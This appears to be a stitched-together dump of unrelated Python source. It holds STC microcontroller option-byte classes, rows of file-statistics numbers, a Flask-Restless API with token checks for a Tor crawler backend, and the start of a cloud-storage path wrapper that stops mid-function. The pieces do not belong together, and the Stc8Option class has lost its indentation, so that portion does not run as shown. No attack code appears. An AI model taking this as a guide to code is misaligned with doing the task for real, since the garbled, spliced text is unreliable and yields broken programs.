    """Manipulate STC15A series option bytes (13-byte MSR block)."""

    def __init__(self, msr):
        super().__init__()
        # STC15A uses a 13-byte MSR block.
        assert len(msr) == 13
        self.msr = bytearray(msr)
        # (name, getter, setter) triples consumed by BaseOption.
        self.options = (
            ("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
            ("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
            ("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
            ("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
            ("low_voltage_reset", self.get_lvrs, self.set_lvrs),
            ("low_voltage_threshold", self.get_low_voltage, self.set_low_voltage),
            ("eeprom_lvd_inhibit", self.get_eeprom_lvd, self.set_eeprom_lvd),
            ("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
            ("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
        )

    def set_trim(self, val):
        # Store the 16-bit trim value big-endian into msr[3:5].
        # Not exposed through self.options.
        self.msr[3:5] = struct.pack(">H", val)

    def get_reset_pin_enabled(self):
        # msr[0] bit 4, active-high.
        return bool(self.msr[0] & 16)

    def set_reset_pin_enabled(self, val):
        val = Utils.to_bool(val)
        self.msr[0] &= 0xef
        self.msr[0] |= 0x10 if bool(val) else 0x00

    def get_watchdog(self):
        # msr[2] bit 5, active-low.
        return not bool(self.msr[2] & 32)

    def set_watchdog(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xdf
        self.msr[2] |= 0x20 if not val else 0x00

    def get_watchdog_idle(self):
        # msr[2] bit 3, active-low.
        return not bool(self.msr[2] & 8)

    def set_watchdog_idle(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xf7
        self.msr[2] |= 0x08 if not val else 0x00

    def get_watchdog_prescale(self):
        # msr[2] bits 0-2 encode prescale as 2**(field + 1), i.e. 2..256.
        return 2 ** (((self.msr[2]) & 0x07) + 1)

    def set_watchdog_prescale(self, val):
        val = Utils.to_int(val)
        wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
        if val not in wd_vals.keys():
            raise ValueError("must be one of %s" % list(wd_vals.keys()))
        self.msr[2] &= 0xf8
        self.msr[2] |= wd_vals[val]

    def get_lvrs(self):
        # msr[1] bit 6, active-high (unlike Stc15Option, which inverts it).
        return bool(self.msr[1] & 64)

    def set_lvrs(self, val):
        val = Utils.to_bool(val)
        self.msr[1] &= 0xbf
        self.msr[1] |= 0x40 if val else 0x00

    def get_eeprom_lvd(self):
        # msr[1] bit 7, active-high.
        return bool(self.msr[1] & 128)

    def set_eeprom_lvd(self, val):
        val = Utils.to_bool(val)
        self.msr[1] &= 0x7f
        self.msr[1] |= 0x80 if val else 0x00

    def get_low_voltage(self):
        # msr[1] bits 0-2: raw threshold selector (0..7).
        return self.msr[1] & 0x07

    def set_low_voltage(self, val):
        val = Utils.to_int(val)
        if val not in range(0, 8):
            raise ValueError("must be one of %s" % list(range(0, 8)))
        self.msr[1] &= 0xf8
        self.msr[1] |= val

    def get_ee_erase(self):
        # msr[12] bit 1, active-low.
        return not bool(self.msr[12] & 2)

    def set_ee_erase(self, val):
        val = Utils.to_bool(val)
        self.msr[12] &= 0xfd
        self.msr[12] |= 0x02 if not val else 0x00

    def get_pindetect(self):
        # msr[12] bit 0, active-low.
        return not bool(self.msr[12] & 1)

    def set_pindetect(self, val):
        val = Utils.to_bool(val)
        self.msr[12] &= 0xfe
        self.msr[12] |= 0x01 if not val else 0x00
class Stc15Option(BaseOption):
    """Manipulate STC15 series option bytes (4+ byte MSR block).

    The optional fifth byte, when present, selects the CPU core voltage.
    """

    def __init__(self, msr):
        super().__init__()
        # STC15 needs at least four option bytes; a fifth enables the
        # core-voltage option below.
        assert len(msr) >= 4
        self.msr = bytearray(msr)
        # (name, getter, setter) triples consumed by BaseOption.
        self.options = (
            ("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
            ("clock_source", self.get_clock_source, self.set_clock_source),
            ("clock_gain", self.get_clock_gain, self.set_clock_gain),
            ("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
            ("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
            ("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
            ("low_voltage_reset", self.get_lvrs, self.set_lvrs),
            ("low_voltage_threshold", self.get_low_voltage, self.set_low_voltage),
            ("eeprom_lvd_inhibit", self.get_eeprom_lvd, self.set_eeprom_lvd),
            ("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
            ("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
            ("por_reset_delay", self.get_por_delay, self.set_por_delay),
            ("rstout_por_state", self.get_p33_state, self.set_p33_state),
            ("uart2_passthrough", self.get_uart_passthrough, self.set_uart_passthrough),
            ("uart2_pin_mode", self.get_uart_pin_mode, self.set_uart_pin_mode),
        )
        if len(msr) > 4:
            self.options += (("cpu_core_voltage", self.get_core_voltage, self.set_core_voltage),)

    def get_reset_pin_enabled(self):
        # msr[2] bit 4, active-low.
        return not bool(self.msr[2] & 16)

    def set_reset_pin_enabled(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xef
        self.msr[2] |= 0x10 if not bool(val) else 0x00

    def get_clock_source(self):
        # msr[2] bit 0: 1 = internal, 0 = external.
        source = bool(self.msr[2] & 0x01)
        return "internal" if source else "external"

    def set_clock_source(self, val):
        sources = {"internal": 1, "external": 0}
        if val not in sources.keys():
            raise ValueError("must be one of %s" % list(sources.keys()))
        self.msr[2] &= 0xfe
        self.msr[2] |= sources[val]

    def get_clock_gain(self):
        # msr[2] bit 1: 1 = "high", 0 = "low".
        gain = bool(self.msr[2] & 0x02)
        return "high" if gain else "low"

    def set_clock_gain(self, val):
        gains = {"low": 0, "high": 1}
        if val not in gains.keys():
            raise ValueError("must be one of %s" % list(gains.keys()))
        self.msr[2] &= 0xfd
        self.msr[2] |= gains[val] << 1

    def get_watchdog(self):
        # msr[0] bit 5, active-low.
        return not bool(self.msr[0] & 32)

    def set_watchdog(self, val):
        val = Utils.to_bool(val)
        self.msr[0] &= 0xdf
        self.msr[0] |= 0x20 if not val else 0x00

    def get_watchdog_idle(self):
        # msr[0] bit 3, active-low.
        return not bool(self.msr[0] & 8)

    def set_watchdog_idle(self, val):
        val = Utils.to_bool(val)
        self.msr[0] &= 0xf7
        self.msr[0] |= 0x08 if not val else 0x00

    def get_watchdog_prescale(self):
        # msr[0] bits 0-2 encode prescale as 2**(field + 1), i.e. 2..256.
        return 2 ** (((self.msr[0]) & 0x07) + 1)

    def set_watchdog_prescale(self, val):
        val = Utils.to_int(val)
        wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
        if val not in wd_vals.keys():
            raise ValueError("must be one of %s" % list(wd_vals.keys()))
        self.msr[0] &= 0xf8
        self.msr[0] |= wd_vals[val]

    def get_lvrs(self):
        # msr[1] bit 6, active-low.
        return not bool(self.msr[1] & 64)

    def set_lvrs(self, val):
        val = Utils.to_bool(val)
        self.msr[1] &= 0xbf
        self.msr[1] |= 0x40 if not val else 0x00

    def get_eeprom_lvd(self):
        # msr[1] bit 7, active-high.
        return bool(self.msr[1] & 128)

    def set_eeprom_lvd(self, val):
        val = Utils.to_bool(val)
        self.msr[1] &= 0x7f
        self.msr[1] |= 0x80 if val else 0x00

    def get_low_voltage(self):
        # msr[1] bits 0-2: raw threshold selector (0..7).
        return self.msr[1] & 0x07

    def set_low_voltage(self, val):
        val = Utils.to_int(val)
        if val not in range(0, 8):
            raise ValueError("must be one of %s" % list(range(0, 8)))
        self.msr[1] &= 0xf8
        self.msr[1] |= val

    def get_ee_erase(self):
        # msr[3] bit 1, active-high.
        return bool(self.msr[3] & 2)

    def set_ee_erase(self, val):
        val = Utils.to_bool(val)
        self.msr[3] &= 0xfd
        self.msr[3] |= 0x02 if val else 0x00

    def get_pindetect(self):
        # msr[3] bit 0, active-low.
        return not bool(self.msr[3] & 1)

    def set_pindetect(self, val):
        val = Utils.to_bool(val)
        self.msr[3] &= 0xfe
        self.msr[3] |= 0x01 if not val else 0x00

    def get_por_delay(self):
        # msr[2] bit 7: 1 = "long", 0 = "short".
        delay = bool(self.msr[2] & 128)
        return "long" if delay else "short"

    def set_por_delay(self, val):
        delays = {"short": 0, "long": 1}
        if val not in delays.keys():
            raise ValueError("must be one of %s" % list(delays.keys()))
        self.msr[2] &= 0x7f
        self.msr[2] |= delays[val] << 7

    def get_p33_state(self):
        # msr[2] bit 3: RSTOUT/P3.3 level after power-on reset.
        return "high" if self.msr[2] & 0x08 else "low"

    def set_p33_state(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xf7
        self.msr[2] |= 0x08 if val else 0x00

    def get_uart_passthrough(self):
        # msr[2] bit 6, active-high.
        return bool(self.msr[2] & 0x40)

    def set_uart_passthrough(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xbf
        self.msr[2] |= 0x40 if val else 0x00

    def get_uart_pin_mode(self):
        # msr[2] bit 5: 1 = push-pull, 0 = normal.
        return "push-pull" if bool(self.msr[2] & 0x20) else "normal"

    def set_uart_pin_mode(self, val):
        modes = {"normal": 0, "push-pull": 1}
        if val not in modes.keys():
            raise ValueError("must be one of %s" % list(modes.keys()))
        self.msr[2] &= 0xdf
        # BUG FIX: the original tested `if val` -- both mode strings are
        # truthy, so push-pull was always selected.  Test the mapped bit
        # value instead (matching Stc8Option.set_uart_pin_mode).
        self.msr[2] |= 0x20 if modes[val] else 0x00

    def get_core_voltage(self):
        # msr[4] magic values; anything else reads as "unknown".
        if self.msr[4] == 0xea: return "low"
        elif self.msr[4] == 0xf7: return "mid"
        elif self.msr[4] == 0xfd: return "high"
        return "unknown"

    def set_core_voltage(self, val):
        volt_vals = {"low": 0xea, "mid": 0xf7, "high": 0xfd}
        if val not in volt_vals.keys():
            raise ValueError("must be one of %s" % list(volt_vals.keys()))
        self.msr[4] = volt_vals[val]
class Stc8Option(BaseOption):
def __init__(self, msr):
super().__init__()
assert len(msr) >= 5
self.msr = bytearray(msr)
self.options = (
("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
("clock_gain", self.get_clock_gain, self.set_clock_gain),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
("low_voltage_reset", self.get_lvrs, self.set_lvrs),
("low_voltage_threshold", self.get_low_voltage, self.set_low_voltage),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
("por_reset_delay", self.get_por_delay, self.set_por_delay),
("rstout_por_state", self.get_p20_state, self.set_p20_state),
("uart1_remap", self.get_uart1_remap, self.set_uart1_remap),
("uart2_passthrough", self.get_uart_passthrough, self.set_uart_passthrough),
("uart2_pin_mode", self.get_uart_pin_mode, self.set_uart_pin_mode),
("epwm_open_drain", self.get_epwm_pp, self.set_epwm_pp),
("program_eeprom_split", self.get_flash_split, self.set_flash_split),
)
def get_reset_pin_enabled(self):
return not bool(self.msr[2] & 16)
def set_reset_pin_enabled(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xef
self.msr[2] |= 0x10 if not bool(val) else 0x00
def get_clock_gain(self):
gain = bool(self.msr[1] & 0x02)
return "high" if gain else "low"
def set_clock_gain(self, val):
gains = {"low": 0, "high": 1}
if val not in gains.keys():
raise ValueError("must be one of %s" % list(gains.keys()))
self.msr[1] &= 0xfd
self.msr[1] |= gains[val] << 1
def get_watchdog(self):
return not bool(self.msr[3] & 32)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xdf
self.msr[3] |= 0x20 if not val else 0x00
def get_watchdog_idle(self):
return not bool(self.msr[3] & 8)
def set_watchdog_idle(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xf7
self.msr[3] |= 0x08 if not val else 0x00
def get_watchdog_prescale(self):
return 2 ** (((self.msr[3]) & 0x07) + 1)
def set_watchdog_prescale(self, val):
val = Utils.to_int(val)
wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
if val not in wd_vals.keys():
raise ValueError("must be one of %s" % list(wd_vals.keys()))
self.msr[3] &= 0xf8
self.msr[3] |= wd_vals[val]
def get_lvrs(self):
return not bool(self.msr[2] & 64)
def set_lvrs(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xbf
self.msr[2] |= 0x40 if not val else 0x00
def get_low_voltage(self):
return 3 - self.msr[2] & 0x03
def set_low_voltage(self, val):
val = Utils.to_int(val)
if val not in range(0, 4):
raise ValueError("must be one of %s" % list(range(0, 4)))
self.msr[2] &= 0xfc
self.msr[2] |= 3 - val
def get_ee_erase(self):
return bool(self.msr[0] & 2)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xfd
self.msr[0] |= 0x02 if val else 0x00
def get_pindetect(self):
return not bool(self.msr[0] & 1)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xfe
self.msr[0] |= 0x01 if not val else 0x00
def get_por_delay(self):
delay = bool(self.msr[1] & 128)
return "long" if delay else "short"
def set_por_delay(self, val):
delays = {"short": 0, "long": 1}
if val not in delays.keys():
raise ValueError("must be one of %s" % list(delays.keys()))
self.msr[1] &= 0x7f
self.msr[1] |= delays[val] << 7
def get_p20_state(self):
return "high" if self.msr[1] & 0x08 else "low"
def set_p20_state(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xf7
self.msr[1] |= 0x08 if val else 0x00
def get_uart_passthrough(self):
return bool(self.msr[1] & 0x10)
def set_uart_passthrough(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xef
self.msr[1] |= 0x10 if val else 0x00
def get_uart_pin_mode(self):
return "push-pull" if bool(self.msr[1] & 0x20) else "normal"
def set_uart_pin_mode(self, val):
modes = {"normal": 0, "push-pull": 1}
if val not in modes.keys():
raise ValueError("must be one of %s" % list(modes.keys()))
self.msr[1] &= 0xdf
self.msr[1] |= 0x20 if modes[val] else 0x00
def get_epwm_pp(self):
    """Return True when the EPWM push-pull option is enabled (bit 2 of msr[1])."""
    return (self.msr[1] & 0x04) != 0
def set_epwm_pp(self, val):
    """Enable/disable the EPWM push-pull option (bit 2 of msr[1], active high)."""
    enable = Utils.to_bool(val)
    self.msr[1] = (self.msr[1] & 0xfb) | (0x04 if enable else 0x00)
def get_uart1_remap(self):
    """Return True when UART1 pin remapping is enabled (bit 6 of msr[1])."""
    return (self.msr[1] & 0x40) != 0
def set_uart1_remap(self, val):
    """Enable/disable UART1 pin remapping (bit 6 of msr[1], active high)."""
    enable = Utils.to_bool(val)
    self.msr[1] = (self.msr[1] & 0xbf) | (0x40 if enable else 0x00)
def get_flash_split(self):
    """Return the flash split boundary in bytes; msr[4] counts 256-byte units."""
    return self.msr[4] << 8
def set_flash_split(self, val):
    """Set the flash split boundary; must be a multiple of 512 in [512, 65024]."""
    num_val = Utils.to_int(val)
    # reject out-of-range or unaligned values before touching the register image
    if not (512 <= num_val <= 65024) or num_val % 512:
        raise ValueError("must be between 512 and 65024 bytes and a multiple of 512 bytes")
    self.msr[4] = num_val >> 8
| 34.078382
| 97
| 0.595341
| 3,997
| 26,956
| 3.825369
| 0.071554
| 0.097973
| 0.030347
| 0.050033
| 0.800065
| 0.780052
| 0.766187
| 0.736364
| 0.727273
| 0.697384
| 0
| 0.049882
| 0.276376
| 26,956
| 791
| 98
| 34.078382
| 0.733979
| 0.05164
| 0
| 0.634391
| 0
| 0
| 0.076896
| 0.008339
| 0
| 0
| 0.028162
| 0
| 0.008347
| 1
| 0.24207
| false
| 0.010017
| 0.005008
| 0.09182
| 0.375626
| 0.006678
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
707e9174e4598650121da4b3696fd751e4aa8960
| 6,468
|
py
|
Python
|
app/api.py
|
TorSpider/TorSpider-Backend
|
a4f22293747153fe03bac37920b4fc444db3f167
|
[
"BSD-3-Clause"
] | 1
|
2018-02-23T08:08:59.000Z
|
2018-02-23T08:08:59.000Z
|
app/api.py
|
TorSpider/TorSpider-Backend
|
a4f22293747153fe03bac37920b4fc444db3f167
|
[
"BSD-3-Clause"
] | 16
|
2018-02-23T14:42:09.000Z
|
2018-04-05T03:38:32.000Z
|
app/api.py
|
TorSpider/TorSpider-Backend
|
a4f22293747153fe03bac37920b4fc444db3f167
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_restless import ProcessingException
from flask_restless_swagger import SwagAPIManager as APIManager
from app import app, db
from app.models import Onions, Urls, Pages, Forms, Links, Nodes
from flask import request
# Flask-Restless manager (with Swagger docs) that auto-generates REST endpoints
# for the SQLAlchemy models registered at the bottom of this module.
manager = APIManager(app, flask_sqlalchemy_db=db)
# Define the different pre_processors to limit API access
def authenticated_preprocessor(search_params=None, **kwargs):
    """
    Flask-Restless preprocessor: authenticate the caller (a spider node or
    the front-end) against the `nodes` table.

    Expected request headers:
        Authorization: token <api_key>
        Authorization-Node: <node unique id>

    Returns True on success; raises ProcessingException(401) otherwise.
    """
    # Both headers are lower-cased, so keys/ids are matched case-insensitively.
    auth = request.headers.get('Authorization', '').lower()
    node = request.headers.get('Authorization-Node', '').lower()
    try:
        # split("token", "<key>"); raises ValueError when the header is malformed
        type_, api_key = auth.split(None, 1)
        if type_ != 'token':
            # invalid Authorization scheme
            raise ProcessingException(description='Not Authorized', code=401)
        # The key/node pair must match a single active node row.
        my_auth = Nodes.query.filter(Nodes.api_key == api_key, Nodes.unique_id == node, Nodes.active == True).first()
        if my_auth:
            # Valid api key
            return True
        else:
            # Token/Node combo is not valid.
            raise ProcessingException(description='Not Authorized', code=401)
    except (ValueError, KeyError):
        # split failures or API key not valid
        raise ProcessingException(description='Not Authorized', code=401)
def authenticated_frontent_only_preprocessor(search_params=None, **kwargs):
    """
    Flask-Restless preprocessor: like authenticated_preprocessor, but ONLY the
    node registered with owner 'FrontEnd' is allowed through (used to guard
    the Nodes endpoint).

    Returns True on success; raises ProcessingException(401) otherwise.
    """
    auth = request.headers.get('Authorization', '').lower()
    node = request.headers.get('Authorization-Node', '').lower()
    # Look up the unique id of the registered front-end node, if any.
    frontend_node = db.session.query(Nodes.unique_id).filter(Nodes.owner == 'FrontEnd').first()
    if frontend_node:
        frontend_node = frontend_node.unique_id
    # NOTE(review): when no 'FrontEnd' row exists, frontend_node stays None and
    # every caller is rejected below — presumably intentional; confirm.
    if node != frontend_node:
        # Won't serve if not frontend
        raise ProcessingException(description='Not Authorized', code=401)
    try:
        type_, api_key = auth.split(None, 1)
        if type_ != 'token':
            # invalid Authorization scheme
            raise ProcessingException(description='Not Authorized', code=401)
        my_auth = Nodes.query.filter(Nodes.api_key == api_key, Nodes.unique_id == node, Nodes.active == True).first()
        if my_auth:
            # Valid api key
            return True
        else:
            # Token/Node combo is not valid.
            raise ProcessingException(description='Not Authorized', code=401)
    except (ValueError, KeyError):
        # split failures or API key not valid
        raise ProcessingException(description='Not Authorized', code=401)
# Endpoints available at /api/<table_name>
def _crud_preprocessors(auth_func):
    """Build a preprocessor map that guards every CRUD verb with *auth_func*.

    A fresh dict (with fresh lists) is built per call so Flask-Restless never
    shares mutable preprocessor state between APIs.
    """
    return dict(GET_SINGLE=[auth_func],
                GET_MANY=[auth_func],
                POST=[auth_func],
                PUT=[auth_func],
                PATCH=[auth_func],
                DELETE=[auth_func])

# Spider-facing tables: identical configuration for each model, so register
# them in a loop instead of six copy-pasted call sites.
for _model in (Onions, Urls, Pages, Forms, Links):
    manager.create_api(_model, methods=['POST', 'GET', 'PUT', 'PATCH'], results_per_page=100,
                       allow_patch_many=True, allow_functions=True,
                       preprocessors=_crud_preprocessors(authenticated_preprocessor))

# Node management is restricted to the front-end and additionally allows DELETE.
manager.create_api(Nodes, methods=['POST', 'GET', 'PUT', 'PATCH', 'DELETE'], results_per_page=100,
                   allow_patch_many=True, allow_functions=True, allow_delete_many=True,
                   preprocessors=_crud_preprocessors(authenticated_frontent_only_preprocessor))
| 53.016393
| 117
| 0.589672
| 594
| 6,468
| 6.195286
| 0.186869
| 0.210598
| 0.066576
| 0.072283
| 0.777989
| 0.772011
| 0.760326
| 0.74538
| 0.74538
| 0.74538
| 0
| 0.009342
| 0.321429
| 6,468
| 121
| 118
| 53.454545
| 0.829118
| 0.087044
| 0
| 0.712644
| 0
| 0
| 0.046798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022989
| false
| 0
| 0.057471
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
563f4f60f902bafd85823be54aa6c6329fdb674b
| 52,455
|
py
|
Python
|
lazy/io/pathz/core.py
|
trisongz/lazycls
|
701bad1a358ed3bb136347d0c5eb81de3201f6a3
|
[
"MIT"
] | 2
|
2021-12-02T00:13:16.000Z
|
2022-02-26T11:18:33.000Z
|
lazy/io/pathz/core.py
|
trisongz/lazycls
|
701bad1a358ed3bb136347d0c5eb81de3201f6a3
|
[
"MIT"
] | null | null | null |
lazy/io/pathz/core.py
|
trisongz/lazycls
|
701bad1a358ed3bb136347d0c5eb81de3201f6a3
|
[
"MIT"
] | null | null | null |
import os
import typing
import ntpath
import pathlib
import posixpath
from importlib import import_module
from typing import Any, ClassVar, Iterator, Optional, Type, TypeVar, Union, Callable, List, TYPE_CHECKING
from lazy.libz import Lib
from . import types
from . import base
# Type variable for "same concrete path class in, same class out" signatures.
_P = TypeVar('_P')
# URI prefixes recognised as cloud-storage locations.
URI_PREFIXES = ('gs://', 's3://', 'minio://', 's3compat://')
_URI_SCHEMES = frozenset(('gs', 's3', 'minio', 's3compat'))
# Maps a URI prefix to the internal pseudo-root used for PurePath parsing,
# so the scheme survives as the first real path components ('/gs/', ...).
_URI_MAP_ROOT = {
    'gs://': '/gs/',
    's3://': '/s3/',
    'minio://': '/minio/',
    's3compat://': '/s3compat/'
}
# Human-readable provider name per URI scheme.
_PROVIDER_MAP = {
    'gs': 'GoogleCloudStorage',
    's3': 'AmazonS3',
    'minio': 'MinIO',
    's3compat': 'S3Compatible'
}
# Re-exported aliases from the sibling `types` and `base` modules.
PathLike = types.PathLike
ReadOnlyPath = base.ReadOnlyPath
ReadWritePath = base.ReadWritePath
PathLikeCls = Union[Type[ReadOnlyPath], Type[ReadWritePath]]
class _IOPath(pathlib.PurePath, ReadWritePath):
"""Pathlib-like API around `fsspec` providing Async Capabilities"""
_PATH: ClassVar[types.ModuleType]
_FSX: ClassVar[types.ModuleType] = None
_FSX_LIB: str = None
_FSX_MODULE: Optional[str] = None
_FSX_CLS: Optional[str] = None
_SYNC_FS: ClassVar[types.ModuleType] = None
_ASYNC_FS: ClassVar[types.ModuleType] = None
@classmethod
def _ensure_lib(cls, *args, **kwargs):
if cls._FSX is not None: return
cls._FSX = Lib.import_lib(cls._FSX_LIB)
if cls._FSX_MODULE: cls._FSX = import_module(cls._FSX_MODULE, package=cls._FSX_LIB)
#cls._FSX = Lib.import_lib(cls._FSX_LIB)
@classmethod
def get_filesystem(cls, is_async: bool = False, *args, **kwargs):
cls._ensure_lib()
if is_async and cls._ASYNC_FS: return cls._ASYNC_FS
if cls._SYNC_FS: return cls._SYNC_FS
authz = cls.get_configz(*args, **kwargs)
if is_async:
cls._ASYNC_FS = getattr(cls._FSX, cls._FSX_CLS)(asynchronous = True, **authz)
return cls._ASYNC_FS
cls._SYNC_FS = getattr(cls._FSX, cls._FSX_CLS)(**authz)
return cls._SYNC_FS
@classmethod
def get_configz(cls, *args, **kwargs):
return {}
@property
def async_fs(self) :
if not self._ASYNC_FS:
self.get_filesystem(is_async=True)
return self._ASYNC_FS
@property
def sync_fs(self):
if not self._SYNC_FS:
self.get_filesystem()
return self._SYNC_FS
def __new__(cls: Type[_P], *parts: types.PathLike) -> _P:
    """Create the path, rewriting a cloud URI prefix to its internal pseudo-root.

    'gs://bucket/x' becomes '/gs/bucket/x' so PurePath parsing keeps the
    scheme as a normal path component; non-cloud paths pass through untouched.

    Bug fix: the original sliced `full_path[:5]`, which only matched the
    5-character prefixes 'gs://'/'s3://' and raised KeyError for
    'minio://' and 's3compat://'. Match each known prefix explicitly instead.
    """
    full_path = '/'.join(os.fspath(p) for p in parts)
    for prefix, root in _URI_MAP_ROOT.items():
        if full_path.startswith(prefix):
            return super().__new__(cls, full_path.replace(prefix, root, 1))
    return super().__new__(cls, *parts)
def _new(self: _P, *parts: types.PathLike) -> _P:
"""Create a new `Path` child of same type."""
return type(self)(*parts)
@property
def _uri_scheme(self) -> Optional[str]:
if (len(self.parts) >= 2 and self.parts[0] == '/' and self.parts[1] in _URI_SCHEMES): return self.parts[1]
else: return None
def get_bucket(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket with optional prefix
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
if prefix: return f'{uri_scheme}://' + parts[0]
return parts[0]
def get_bucket_path(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket + path with optional prefix
removes the versioning
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
p = '/'.join(parts[:2])
if prefix: return f'{uri_scheme}://' + p
return p
@property
def bucket(self) -> Optional[str]:
if self._uri_scheme: return self._PATH.join(f'{self._uri_scheme}://', self.parts[3])
return None
@property
def bucket_path(self) -> Optional[str]:
if self._uri_scheme: return self._PATH.join(*self.parts[3:])
return None
@property
def _path_str(self) -> str:
"""
Returns the `__fspath__` string representation.
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(f'{uri_scheme}://', *self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
@property
def string(self) -> str:
"""
Returns the extension for a file
"""
return self._path_str
@property
def _filename_str(self) -> str:
"""
Returns the filename if is file, else ''
"""
if self.is_file(): return self.parts[-1]
return ''
@property
def extension(self) -> str:
"""
Returns the extension for a file
"""
return self.suffix
@property
def _cpath_str(self) -> str:
"""
Returns the `__fspath__` string representation without the uri_scheme
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(*self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
def __fspath__(self) -> str:
return self._path_str
def __str__(self) -> str: # pylint: disable=invalid-str-returned
return self._path_str
def __repr__(self) -> str:
return f'{type(self).__name__}({self._path_str!r})'
def expanduser(self: _P) -> _P:
"""
Returns a new path with expanded `~` and `~user` constructs.
"""
return self._new(self._PATH.expanduser(self._path_str))
def resolve(self: _P, strict: bool = False) -> _P:
"""
Returns the abolute path.
"""
if self.is_cloud: return self._new(self.as_posix())
return self._new(self._PATH.abspath(self._path_str))
def copydir(self: _P, dst: base.PathLike, ignore=['.git'], overwrite: bool = False, dryrun: bool = False):
"""
Copies the Current Top Level Parent Dir to the Dst Dir without recursion
"""
dst = self._new(dst)
assert dst.is_dir(), 'Destination is not a valid directory'
if not dryrun: dst.ensure_dir()
copied_files = []
fnames = self.listdir(ignore=ignore)
curdir = self.absolute_parent
for fname in fnames:
dest_path = dst.joinpath(fname.relative_to(curdir))
if not dryrun: fname.copy(dest_path, overwrite=overwrite, skip_errors=True)
copied_files.append(dest_path)
return copied_files
def copydirs(self: _P, dst: base.PathLike, mode: str = 'shallow', pattern='*', ignore=['.git'], overwrite: bool = False, levels: int = 2, dryrun: bool = False):
"""Copies the Current Parent Dir to the Dst Dir.
modes = [shallow for top level recursive. recursive for all nested]
levels = number of recursive levels
dryrun = returns all files that would have been copied without copying
"""
assert mode in {'shallow', 'recursive'}, 'Invalid Mode Option: [shallow, recursive]'
dst = self._new(dst)
assert dst.is_dir(), 'Destination is not a valid directory'
levels = max(1, levels)
dst.ensure_dir()
curdir = self.absolute_parent
copied_files = []
if levels > 1 and mode == 'recursive' and '/' not in pattern:
for _ in range(1, levels): pattern += '/*'
if self.is_dir() and not pattern.startswith('/'): pattern = '*/' + pattern
fiter = curdir.glob(pattern) if mode == 'shallow' else curdir.rglob(pattern)
fnames = [f for f in fiter if not bool(set(f.parts).intersection(ignore))]
for f in fnames:
dest_path = dst.joinpath(f.relative_to(curdir))
if not dryrun:
if f.is_dir(): dest_path.ensure_dir()
else: f.copy(dest_path, overwrite=overwrite, skip_errors=True)
copied_files.append(dest_path)
return copied_files
def listdir(self: _P, ignore=['.git'], skip_dirs=True, skip_files=False):
fnames = [f for f in self.iterdir() if not bool(set(f.parts).intersection(ignore))]
fnames = [f.resolve() for f in fnames]
if skip_dirs:
return [f for f in fnames if f.is_file()]
if skip_files:
return [f for f in fnames if f.is_dir()]
return fnames
def listdirs(self: _P, mode: str = 'shallow', pattern='*', ignore=['.git'], skip_dirs=True, skip_files=False, levels: int = 2):
"""Lists all files in current parent dir
modes = [shallow for top level recursive. recursive for all nested]
"""
assert mode in {'shallow', 'recursive'}, 'Invalid Mode Option: [shallow, recursive]'
curdir = self.absolute_parent
levels = max(1, levels)
if levels > 1 and mode == 'recursive' and '/' not in pattern:
